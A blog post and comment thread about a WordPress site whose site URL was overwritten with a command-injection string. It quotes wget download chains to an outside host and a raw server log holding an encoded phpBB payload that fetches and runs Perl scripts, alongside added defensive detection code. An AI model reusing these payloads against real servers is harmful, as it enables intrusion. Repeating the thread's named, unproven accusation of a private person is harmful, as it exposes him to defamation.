Huh? Did someone hack my site? I loaded the page and got no CSS, so checked the template to find that the link to the CSS file had been replaced by this (I added line breaks, this was really all one long line):

http://huminf.uib.no/~jill/wp-login.php?
action=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;
wget%20www.visualcoders.net/spybot.txt;
wget%20www.visualcoders.net/worm1.txt;
wget%20www.visualcoders.net/php.txt;
wget%20www.visualcoders.net/ownz.txt;
wget%20www.visualcoders.net/wp-layout.css

My template was fine, so I looked at the options, and sure enough, my “site URL”, which WordPress glues into the template for almost every link it makes and which is supposed to be simply this: “http://huminf.uib.no/~jill/”, had been changed to all the following:

http://huminf.uib.no/~jill/wp-login.php?
action=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;
wget%20www.visualcoders.net/spybot.txt;
wget%20www.visualcoders.net/worm1.txt;
wget%20www.visualcoders.net/php.txt;
wget%20www.visualcoders.net/ownz.txt;
wget%20www.visualcoders.net

That looks very uncool. Now even to a total amateur at PHP like me, that seems to read as though every time someone looks at my blog, instead of the site fetching a CSS file that makes the page look pretty, an action is invoked that “gets” (“wget”, yeah?) a whole pile of nasty files called things like spy.gif and worm1.txt.

Does anyone understand this? What are they actually trying to do? Would this affect readers or my site? Would I have seen all sorts of stupid messages about how “spykids ownz your browser” if I’d been using Windows and Microsoft Explorer instead of Firefox on a Mac? And how the heck did they change my site URL?

I fixed it, but I should obviously do something about security, huh? Except it’s Christmas! I don’t have time for this!!!
[I’ve asked for help at the WordPress support forum as well, and I filed a complaint against visualcoders.net with Google, who run adwords through them. And I emailed the person who registered the domain, Mimoun Raddahi, who lives in Antwerpen, Belgium. Is there any chance visualcoders.net isn’t to blame here?]
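
An added example (Python, written for this page and not part of the original post) of why the template suddenly pointed at that long link: WordPress stores the “site URL” as the siteurl option in its options table and joins relative paths onto it, so a poisoned value simply gets “/wp-layout.css” appended and ends up in the page as the stylesheet link. The expected site URL and the poisoned value are the ones quoted in the post; the plain string join, the stylesheet file name wp-layout.css (taken from the suffix of the link above) and the list of things worth checking in the stored value are my assumptions.

```python
"""Added example: reproduce the bogus stylesheet link from a poisoned
WordPress site URL, and a sanity check for the stored option value.
The site URL values come from the post; the join and the checks are
assumptions made for this example."""
from urllib.parse import urlsplit, unquote

EXPECTED_SITEURL = "http://huminf.uib.no/~jill/"

# The poisoned value quoted in the post, joined back into the single line it really was.
POISONED_SITEURL = (
    "http://huminf.uib.no/~jill/wp-login.php?"
    "action=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;"
    "wget%20www.visualcoders.net/spybot.txt;"
    "wget%20www.visualcoders.net/worm1.txt;"
    "wget%20www.visualcoders.net/php.txt;"
    "wget%20www.visualcoders.net/ownz.txt;"
    "wget%20www.visualcoders.net"
)


def stylesheet_link(siteurl: str, path: str = "wp-layout.css") -> str:
    """Glue a relative path onto the site URL the way the template does
    (assumed here to be a plain string join)."""
    return siteurl.rstrip("/") + "/" + path


def siteurl_problems(value: str, expected: str = EXPECTED_SITEURL) -> list:
    """Return the reasons a stored site URL should not be trusted.

    An empty list means the value looks like a plain scheme://host/path
    and matches what the site owner expects."""
    problems = []
    got, exp = urlsplit(value), urlsplit(expected)
    if got.scheme not in ("http", "https"):
        problems.append(f"unexpected scheme {got.scheme!r}")
    if got.netloc != exp.netloc:
        problems.append(f"host changed from {exp.netloc!r} to {got.netloc!r}")
    if got.path != exp.path:
        problems.append(f"path changed from {exp.path!r} to {got.path!r}")
    if got.query or got.fragment:
        problems.append("site URL carries a query string or fragment")
    # A site URL has no business containing shell separators or commands,
    # even percent-encoded ones (%20 is a space).
    decoded = unquote(value)
    for token in (";", "wget ", "cmd="):
        if token in decoded:
            problems.append(f"shell-looking token {token!r} in site URL")
    return problems


if __name__ == "__main__":
    print(stylesheet_link(EXPECTED_SITEURL))
    print(stylesheet_link(POISONED_SITEURL))
    for p in siteurl_problems(POISONED_SITEURL):
        print("-", p)
```

Run it and the second printed link ends in “wget%20www.visualcoders.net/wp-layout.css”, exactly the tail of the link the post found in the template. The check is the kind of thing worth running from cron against the options table after an incident like this, since the template itself was untouched and only the stored value had changed.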

10 thoughts on “did my blog just get hacked?”

  1. L33tdawg

    The attack you speak of is actually quite well known — if you look at the contents of the text files you’ll see that they’re basically PERL scripts designed to compromise anyone who unsuspectingly clicks on the link and is vulnerable (IE users only). That being said, if you examine the ownz.txt file you’ll see that this ‘kit’ has been assembled by the rather well known group ‘Spykids’ (http://www.zone-h.org/en/defacements/filter/filter_defacer=spykids). It looks like you either have a member of Spykids trying to ‘own’ your site or a script kiddie who happens to have the spykid ‘kit’ so to speak. You might want to see if there are any vulns for your version of WordPress.

    Good luck.

    Cheers,
    LD.

  2. Elin

    Something odd is happening at my site too – my index file is being replaced now and then. It has been happening for some months – but I don’t have time to look at it. Argh.

  3. AWolf

    wget is a network utility to retrieve files from the Web using http and ftp and it runs from the command line in *nix operating systems. It is very useful for mirroring sites and if you aren’t careful, it might try to download the entire internet onto your server (a mistake I made several years ago when I was moving my websites to a new service provider). Also the “%20” is a blank space in html. My original guess was that visualcoders.net was the intended victim of your site being hacked. That is just a guess.

  4. Tom Bartling

    One of my websites also got hit, although I haven’t found any negative effects. They tried to access a page that’s looking for an ID number, but they replaced the ID with the same info that you posted.

    I did a little research.
    The hit came from IP address 213.193.231.130.
    213.193.231.130 is owned by Tom Myny at Linux Systems.
    The script pointed to visualcoders.net.
    Tracking the IP for visualcoders.net using traceroute (or tracert on Windows) finds visualcoders.net is located at 213.193.231.130.
    visualcoders.net is owned by Mimoun Raddahi.
    The original email address for Mimoun Raddahi is mimoun@pandora.be
    pandora.be is a domain that is owned by Telenet.

    I suspect that Mimoun Raddahi is the hacker. I sent an email to Tom Myny at Linux Systems (the hosting company for visualcoders.net), and I copied the Technical Contact at Telenet.

    Hopefully, this will resolve the hacking problem.

    On a side note, this happened to me on Dec. 26th. While doing research, I Googled “Mimoum Raddahi” and found this website, one day after your posting. Man, google is fast.

  5. Tom Myny

    Hi All,

    A script was running on our servers (wget%20www.visualcoders.net/spybot.txt;
    wget%20www.visualcoders.net/worm1.txt;) because one of the customers phpbb sites was hacked. (viewforum.php bug)
    I removed the buggy php file and stopped the processes.
    visualcoders.net is not hosted by us (never was …)

    perl php.txt SERVER_SIGNATURE=

    Apache/1.3.31 Server at http://www.tegenwind.be Port 80

    ? UNIQUE_ID=Qc5aCdXB54IAABRQNuQ HTTP_USER_AGENT=lwp-trivial/1.35 SERVER_PORT=80 HTTP_HOST=www.tegenwind.be SCRIPT_FILENAME=forum/viewtopic.php REQUEST_URI=/forum/viewtopic.php?t=97&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr
(47)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)%252echr(101)%252echr(116)%252echr(47)%252echr(122)%252echr(111)%252echr(110)%252echr(101)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(115)%252echr(112)%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%252echr(49)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(112)%252echr(104)%252echr(112)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527 SCRIPT_NAME=/forum/viewtopic.php REMOTE_HOST=sun2.netwerkshop.nl REMOTE_PORT=56449 PATH=/bin:/usr/bin PWD=/tmp SERVER_ADMIN=webmaster@linuxsystems.be REDIRECT_STATUS=200 PATH_TRANSLATED=forum/viewtopic.php REMOTE_ADDR=194.109.209.106 SHLVL=1 SERVER_NAME=www.tegenwind.be

    Best Regards,
    Tom

  6. Messenger

    HOLA

  7. Lars

    Indeed the 1st Google return for Mimoun Raddahi is this thread..!!!

    Our stats file showed a 5x leap in page views on xmas day and from looking at the log files I found pretty much the same string described above.. hitting us every couple of seconds and coming from multiple IP addys.

    Then I noticed a repetitive request string using LWP:
    http://www.google.com/search?hl=en&q=LWP&btnG=Google+Search
    which looks like a data scrape script. I reported the flood
    to Go Daddy but wouldn’t ya know it; visualcoders.net is now
    hosted (already) somewhere else.

    At least we haven’t had any problems with re-write of our files
    but this kind of action def. borders on the criminal, imho 8-(

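An added example (Python, written for this page; it is not code from anyone in the thread) that decodes the kind of payload Tom Myny’s environment dump shows in the phpBB viewtopic.php “highlight” parameter and flags access-log lines carrying either that request or the wp-login.php?cmd= form from the post, which is what Lars found in his logs. The payload is double URL-encoded (%2527 becomes %27 becomes a quote, %252e becomes %2e becomes a dot) and spells the shell command as a chain of chr() calls; the decoder just reverses both layers. The log lines and IP addresses below are constructed for the example, and the sample payload encodes a shorter command than the real one.

```python
"""Added example: decode the double URL-encoded chr() payload from the
thread's phpBB request and flag log lines that carry that family of
request. Log lines, timestamps and IPs are constructed; the payload
shape is the one quoted in the thread, shortened to one command."""
import re
from urllib.parse import unquote

# Constructed sample in the same shape as the thread's payload, encoding only
#   cd /tmp;wget www.visualcoders.net/spybot.txt
SAMPLE_HIGHLIGHT = (
    "%2527%252esystem("
    "chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)"
    "%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)"
    "%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)"
    "%252echr(46)%252echr(118)%252echr(105)%252echr(115)%252echr(117)"
    "%252echr(97)%252echr(108)%252echr(99)%252echr(111)%252echr(100)"
    "%252echr(101)%252echr(114)%252echr(115)%252echr(46)%252echr(110)"
    "%252echr(101)%252echr(116)%252echr(47)%252echr(115)%252echr(112)"
    "%252echr(121)%252echr(98)%252echr(111)%252echr(116)%252echr(46)"
    "%252echr(116)%252echr(120)%252echr(116)"
    ")%252e%2527"
)

# Constructed Apache combined-format lines (documentation-range addresses).
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Dec/2004:03:12:45 +0100] "GET /forum/viewtopic.php?t=97&highlight='
    + SAMPLE_HIGHLIGHT + ' HTTP/1.0" 200 5120 "-" "lwp-trivial/1.35"',
    '198.51.100.7 - - [26/Dec/2004:03:13:02 +0100] "GET /forum/viewtopic.php?t=97&highlight=wordpress HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [26/Dec/2004:03:13:40 +0100] "GET /~jill/wp-login.php?action=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt HTTP/1.0" 200 311 "-" "lwp-trivial/1.35"',
]

CHR_CALL = re.compile(r"chr\((\d{1,3})\)")


def decode_payload(value: str) -> str:
    """Strip both URL-encoding layers and rebuild the string the chr() calls spell.

    The outer layer is removed by the web server / PHP, the inner one by the
    application's own decoding, so the quote and dots reach the evaluated
    PHP intact. Returns "" when the value carries no system() call."""
    decoded = unquote(unquote(value))
    if "system(" not in decoded:
        return ""
    return "".join(chr(int(n)) for n in CHR_CALL.findall(decoded) if int(n) < 256)


def request_target(line: str) -> str:
    """Pull the request target out of a combined-format access log line."""
    m = re.search(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d"', line)
    return m.group(1) if m else ""


# Markers that survive double-decoding in the two request families the thread shows.
SUSPICIOUS = re.compile(
    r"system\s*\(|passthru\s*\(|shell_exec\s*\(|chr\(\d+\)\s*\.|\bwget\s+\S|\bcd\s+/tmp\b|[?&]cmd=",
    re.I,
)


def is_injection_attempt(line: str) -> bool:
    """True when the (double-decoded) request target looks like command injection."""
    target = request_target(line)
    return bool(target) and SUSPICIOUS.search(unquote(unquote(target))) is not None


def recovered_command(line: str) -> str:
    """Best effort at the shell command a flagged request is trying to run."""
    target = request_target(line)
    cmd = decode_payload(target)
    if cmd:
        return cmd
    m = re.search(r"[?&]cmd=([^&]*)", unquote(target))
    return m.group(1) if m else ""


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        if is_injection_attempt(line):
            print("FLAGGED:", recovered_command(line))
```

Both flagged lines decode to the same “cd /tmp;wget …” command, which is the point: the phpBB and WordPress requests are two delivery routes for one kit, and what it does on the server is just fetch files into /tmp and run them, so a hunt that greps for the decoded markers rather than the raw URL catches both.
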
  8. Jill

    Wow, thanks guys, for the speedy work! Google works really fast, yes…

    There’s a lot more about this kind of attack on WordPress blog in the WordPress support forums – it’s done simply by typing commands into the URL. The vulnerability is fixed in the latest version of WordPress, or you can delete a few lines from one of the files in earlier versions to protect your system. Discussions are here and here.

    Scary, huh?

  9. k

    welcome to the internet.

  10. Bryan-Mitchell Young

    Apparently, it is a new worm going around that attacks PHP sites, including wordpress.
